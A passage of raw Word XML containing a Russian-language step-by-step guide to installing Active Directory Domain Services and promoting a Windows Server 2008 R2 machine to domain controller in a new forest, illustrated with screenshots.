      </w:r>
      <w:r>
        <w:t>взаимный</w:t>
      </w:r>
      <w:r w:rsidRPr="001A62A9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ping</w:t>
      </w:r>
      <w:r w:rsidRPr="001A62A9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>между</w:t>
      </w:r>
      <w:r w:rsidRPr="001A62A9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="001A62A9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Server</w:t>
      </w:r>
      <w:r w:rsidRPr="001A62A9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2008 </w:t>
      </w:r>
      <w:r>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="001A62A9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Windows 7</w:t>
      </w:r>
      <w:r w:rsidRPr="001A62A9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ADC401C" w14:textId="41569120" w:rsidR="008B564E" w:rsidRPr="00984E27" w:rsidRDefault="008B564E" w:rsidP="009A06FD">
      <w:r w:rsidRPr="00984E27">
        <w:t xml:space="preserve">6. </w:t>
      </w:r>
      <w:r>
        <w:t>Добавить</w:t>
      </w:r>
      <w:r w:rsidRPr="00984E27">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>роль</w:t>
      </w:r>
      <w:r w:rsidRPr="00984E27">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="00984E27">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>настроить</w:t>
      </w:r>
      <w:r w:rsidRPr="00984E27">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Active</w:t>
      </w:r>
      <w:r w:rsidRPr="00984E27">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Directory</w:t>
      </w:r>
      <w:r w:rsidRPr="00984E27">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>на</w:t>
      </w:r>
      <w:r w:rsidRPr="00984E27">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00984E27">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Server</w:t>
      </w:r>
      <w:r w:rsidR="001A62A9" w:rsidRPr="00984E27">
        <w:t xml:space="preserve"> 2008</w:t>
      </w:r>
      <w:r w:rsidR="00DB30B6" w:rsidRPr="00984E27">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF0D710" w14:textId="6E10E470" w:rsidR="009E6CEC" w:rsidRDefault="009E6CEC" w:rsidP="001E253C">
      <w:r>
        <w:t>___________________________________________________________________</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="322F1E0C" w14:textId="555F8157" w:rsidR="009E6CEC" w:rsidRDefault="009E6CEC" w:rsidP="001E253C">
      <w:r>
        <w:t>Примечание:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D5F2287" w14:textId="60D48229" w:rsidR="001E253C" w:rsidRPr="00C901F7" w:rsidRDefault="001E253C" w:rsidP="001E253C">
      <w:r>
        <w:t>Имя сервера можно по желанию изменить в настройках компьютера</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15BC3EDB" w14:textId="2FC1C5FD" w:rsidR="001E253C" w:rsidRDefault="001E253C" w:rsidP="001E253C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1C418AB" wp14:editId="0AF35268">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3547271</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>925830</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2702257" cy="614150"/>
                <wp:effectExtent l="0" t="0" r="22225" b="14605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2257" cy="614150"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="2702257" cy="614150"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="16" name="Овал 16"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2320120" y="423081"/>
                            <a:ext cx="382137" cy="19106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Овал 17"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1856096" y="129654"/>
                            <a:ext cx="382137" cy="19106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Овал 18"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="382137" cy="19106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group w14:anchorId="667BE6CA" id="Группа 19" o:spid="_x0000_s1026" style="position:absolute;margin-left:279.3pt;margin-top:72.9pt;width:212.8pt;height:48.35pt;z-index:251659264" coordsize="27022,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">
                <v:oval id="Овал 16" o:spid="_x0000_s1027" style="position:absolute;left:23201;top:4230;width:3821;height:19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" filled="f" strokecolor="#c00000" strokeweight="1pt">
                  <v:stroke joinstyle="miter"/>
                </v:oval>
                <v:oval id="Овал 17" o:spid="_x0000_s1028" style="position:absolute;left:18560;top:1296;width:3822;height:19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" filled="f" strokecolor="#c00000" strokeweight="1pt">
                  <v:stroke joinstyle="miter"/>
                </v:oval>
                <v:oval id="Овал 18" o:spid="_x0000_s1029" style="position:absolute;width:3821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" filled="f" strokecolor="#c00000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3AD240B" wp14:editId="144C7FAF">
            <wp:extent cx="2880000" cy="20003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5CB0D34" wp14:editId="69C6594F">
            <wp:extent cx="2880000" cy="2012472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7280" w14:textId="77777777" w:rsidR="009E6CEC" w:rsidRDefault="009E6CEC" w:rsidP="009E6CEC">
      <w:r>
        <w:t>___________________________________________________________________</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D559EC" w14:textId="77777777" w:rsidR="009E6CEC" w:rsidRDefault="009E6CEC" w:rsidP="001E253C">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CCBA845" w14:textId="731A3F99" w:rsidR="0075204F" w:rsidRDefault="0075204F" w:rsidP="009A06FD">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0075204F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Открываем</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0075204F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> «Server Manager» и в </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0075204F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>пункте</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0075204F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> «Roles» </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0075204F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>выбираем</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0075204F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> «Add Roles».</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26483CEB" w14:textId="54953E48" w:rsidR="0075204F" w:rsidRPr="0075204F" w:rsidRDefault="0075204F" w:rsidP="00DF6AF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E00C5B" wp14:editId="63BF5008">
            <wp:extent cx="5390709" cy="1787856"/>
            <wp:effectExtent l="0" t="0" r="63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44"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400000" cy="179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BC892" w14:textId="35A28765" w:rsidR="00DF6AFD" w:rsidRDefault="00DF6AFD" w:rsidP="009A06FD">
      <w:r w:rsidRPr="00DF6AFD">
        <w:t>Нажимаем на кнопку «</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DF6AFD">
        <w:t>Next</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DF6AFD">
        <w:t>».</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37310F01" w14:textId="7C3CF09B" w:rsidR="00DF6AFD" w:rsidRDefault="00DF6AFD" w:rsidP="00DF6AFD">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5A463C68" wp14:editId="5F9A0A42">
            <wp:extent cx="5400000" cy="397816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97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D86E" w14:textId="2D1810DC" w:rsidR="00DF6AFD" w:rsidRDefault="00DF6AFD" w:rsidP="009A06FD">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DF6AFD">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Выбираем</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DF6AFD">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DF6AFD">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>роль</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DF6AFD">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> «Active Directory Domain Services».</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F4B9866" w14:textId="741DC165" w:rsidR="00DF6AFD" w:rsidRPr="00DF6AFD" w:rsidRDefault="00DF6AFD" w:rsidP="00DF6AF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86D368" wp14:editId="402702E6">
            <wp:extent cx="5400000" cy="3978168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97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59E7" w14:textId="3A6DBC33" w:rsidR="00DF6AFD" w:rsidRDefault="00DF6AFD" w:rsidP="00DF6AFD">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DF6AFD">
        <w:t>На следующем этапе «Мастер установки ролей» предупредит, что для установки роли «</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF6AFD">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Active</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF6AFD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DF6AFD">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Directory</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF6AFD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DF6AFD">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Domain</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF6AFD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DF6AFD">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Services</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF6AFD">
        <w:t>» нужно установить несколько компонентов.</w:t>
      </w:r>
      <w:r w:rsidR="00ED3ECF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DF6AFD">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Нажимаем</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DF6AFD">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DF6AFD">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>на</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DF6AFD">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DF6AFD">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>кнопку</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DF6AFD">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> «Add Required Features».</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AEFBC86" w14:textId="5B716C04" w:rsidR="00DF6AFD" w:rsidRPr="00DF6AFD" w:rsidRDefault="00DF6AFD" w:rsidP="00DF6AF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F2D315" wp14:editId="25DCE184">
            <wp:extent cx="5400000" cy="258188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DDD8D" w14:textId="1BC0BE31" w:rsidR="00DF6AFD" w:rsidRDefault="00DF6AFD" w:rsidP="00DF6AFD">
      <w:r>
        <w:t xml:space="preserve">На этом этапе выбирать роль DNS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Server</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> не обязательно. Она будет установлена позже. </w:t>
      </w:r>
      <w:r w:rsidR="00ED3ECF">
        <w:t>Нажимаем на кнопку «</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00ED3ECF">
        <w:t>Next</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00ED3ECF">
        <w:t>».</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57976762" w14:textId="42D92B42" w:rsidR="00DF6AFD" w:rsidRDefault="00DF6AFD" w:rsidP="00DF6AFD">
      <w:r>
        <w:t>Далее «Мастер установки ролей» предлагает ознакомиться с дополнительной информацией касательно роли «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>».</w:t>
      </w:r>
      <w:r w:rsidR="00ED3ECF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Нажимаем на кнопку «</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Next</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>».</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="439A421B" w14:textId="028AECB2" w:rsidR="00DF6AFD" w:rsidRDefault="00DF6AFD" w:rsidP="00ED3ECF">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="74B2E55D" wp14:editId="3D1ED788">
            <wp:extent cx="5400000" cy="3978168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97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D5219" w14:textId="4BA6D733" w:rsidR="00ED3ECF" w:rsidRDefault="00ED3ECF" w:rsidP="009A06FD">
      <w:r w:rsidRPr="00ED3ECF">
        <w:t>Для того чтобы начать установку выбранной роли, нажимаем на кнопку «</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00ED3ECF">
        <w:t>Install</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00ED3ECF">
        <w:t>».</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A9AA3C8" w14:textId="756B149D" w:rsidR="00ED3ECF" w:rsidRDefault="00ED3ECF" w:rsidP="00ED3ECF">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4F63EED8" wp14:editId="78A6F754">
            <wp:extent cx="5400000" cy="3978168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97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48CD" w14:textId="07CCF864" w:rsidR="00ED3ECF" w:rsidRDefault="00ED3ECF" w:rsidP="009A06FD">
      <w:r w:rsidRPr="00ED3ECF">
        <w:t>Началась установка выбранной роли и необходимых для нее компонентов.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D61D3CA" w14:textId="266F6C8B" w:rsidR="00ED3ECF" w:rsidRDefault="00ED3ECF" w:rsidP="00ED3ECF">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4F1EEC93" wp14:editId="3D80D65D">
            <wp:extent cx="5400000" cy="3978168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97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9FE9" w14:textId="24404789" w:rsidR="00ED3ECF" w:rsidRPr="00ED3ECF" w:rsidRDefault="00ED3ECF" w:rsidP="00ED3ECF">
      <w:r>
        <w:t>После</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED3ECF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>у</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED3ECF">
        <w:t>становк</w:t>
      </w:r>
      <w:r>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED3ECF">
        <w:t xml:space="preserve"> роли нажимаем на кнопку «</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED3ECF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Close</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED3ECF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED3ECF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>this</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED3ECF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED3ECF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>wizard</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED3ECF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED3ECF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED3ECF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED3ECF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>launch</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED3ECF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED3ECF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED3ECF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED3ECF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Active</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED3ECF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED3ECF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Directory</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED3ECF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED3ECF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Domain</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED3ECF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED3ECF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Services</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED3ECF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED3ECF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Installation</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED3ECF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED3ECF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Wizard</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED3ECF">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00ED3ECF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dcpromo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00ED3ECF">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED3ECF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED3ECF">
        <w:t>)», для того чтобы повысить роль вашего сервера до уровня контроллера домена.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1860D254" w14:textId="76FF9344" w:rsidR="00ED3ECF" w:rsidRDefault="00ED3ECF" w:rsidP="00ED3EC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4D883A" wp14:editId="7349F316">
            <wp:extent cx="5400000" cy="3978168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97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96B5" w14:textId="5F8A2389" w:rsidR="00ED3ECF" w:rsidRDefault="00ED3ECF" w:rsidP="00ED3ECF">
      <w:r w:rsidRPr="00ED3ECF">
        <w:lastRenderedPageBreak/>
        <w:t>Нажимаем на кнопку «</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED3ECF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Next</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED3ECF">
        <w:t>».</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51823994" w14:textId="2D661996" w:rsidR="00ED3ECF" w:rsidRPr="00ED3ECF" w:rsidRDefault="00ED3ECF" w:rsidP="00ED3ECF">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4786D594" wp14:editId="24506830">
            <wp:extent cx="3960000" cy="3750192"/>
            <wp:effectExtent l="0" t="0" r="254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75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4279" w14:textId="77777777" w:rsidR="00ED3ECF" w:rsidRDefault="00ED3ECF" w:rsidP="00ED3ECF">
      <w:r>
        <w:t xml:space="preserve">Далее предлагается ознакомиться с дополнительной информацией касательно функционала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2008 R2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="621C25C6" w14:textId="1F697EA3" w:rsidR="00ED3ECF" w:rsidRDefault="00ED3ECF" w:rsidP="00ED3ECF">
      <w:r>
        <w:t>Нажимаем на кнопку «</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Next</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>».</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D2BE784" w14:textId="44380537" w:rsidR="00ED3ECF" w:rsidRDefault="00ED3ECF" w:rsidP="00ED3ECF">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0FD31198" wp14:editId="23618CCB">
            <wp:extent cx="3780000" cy="3579728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57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44C61" w14:textId="2C287E3D" w:rsidR="00ED3ECF" w:rsidRDefault="00ED3ECF" w:rsidP="00ED3ECF">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>В данном руководстве рассматривается добавление нового леса, поэтому в окне выбираем пункт «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forest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>».</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="672A322D" w14:textId="6DC38F13" w:rsidR="00ED3ECF" w:rsidRDefault="00ED3ECF" w:rsidP="00ED3ECF">
      <w:r>
        <w:t>Нажимаем на кнопку «</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Next</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>».</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0254B3D5" w14:textId="23F1B017" w:rsidR="00ED3ECF" w:rsidRDefault="00ED3ECF" w:rsidP="00ED3ECF">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0FFBCBE5" wp14:editId="667F50C0">
            <wp:extent cx="3780000" cy="3579727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57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4AAF" w14:textId="5803EEA3" w:rsidR="00ED3ECF" w:rsidRDefault="00ED3ECF" w:rsidP="00ED3ECF">
      <w:r>
        <w:t xml:space="preserve">В поле «FQDN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forest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domain</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>» указываем имя корневого домена.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50889284" w14:textId="7C3DA8F9" w:rsidR="00ED3ECF" w:rsidRDefault="00ED3ECF" w:rsidP="00ED3ECF">
      <w:r>
        <w:t>Нажимаем на кнопку «</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Next</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>».</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64886206" w14:textId="7BF6391D" w:rsidR="00ED3ECF" w:rsidRDefault="00ED3ECF" w:rsidP="00ED3ECF">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2FFA147B" wp14:editId="534AC082">
            <wp:extent cx="3960000" cy="3746587"/>
            <wp:effectExtent l="0" t="0" r="254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4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68C7" w14:textId="04BCD1BA" w:rsidR="00ED3ECF" w:rsidRDefault="00ED3ECF" w:rsidP="00ED3ECF">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">На следующем шаге предлагается выбрать функциональный уровень нового леса и корневого домена. </w:t>
      </w:r>
      <w:r w:rsidR="00D04619">
        <w:t>Н</w:t>
      </w:r>
      <w:r>
        <w:t>еобходимо выбрать «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2008 R2».</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DDF047C" w14:textId="2D8B51B9" w:rsidR="00ED3ECF" w:rsidRDefault="00ED3ECF" w:rsidP="00ED3ECF">
      <w:r>
        <w:t>Нажимаем на кнопку «</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Next</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>».</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54CAEF30" w14:textId="062F1F1B" w:rsidR="00ED3ECF" w:rsidRDefault="00ED3ECF" w:rsidP="00ED3ECF">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6302B8ED" wp14:editId="663D0B1E">
            <wp:extent cx="3960000" cy="3750192"/>
            <wp:effectExtent l="0" t="0" r="254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75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39E1" w14:textId="77777777" w:rsidR="00D04619" w:rsidRDefault="00D04619" w:rsidP="00D04619">
      <w:r>
        <w:t xml:space="preserve">Для корректной работы контроллера домена необходимо установить роль «DNS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>server</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>».</w:t>
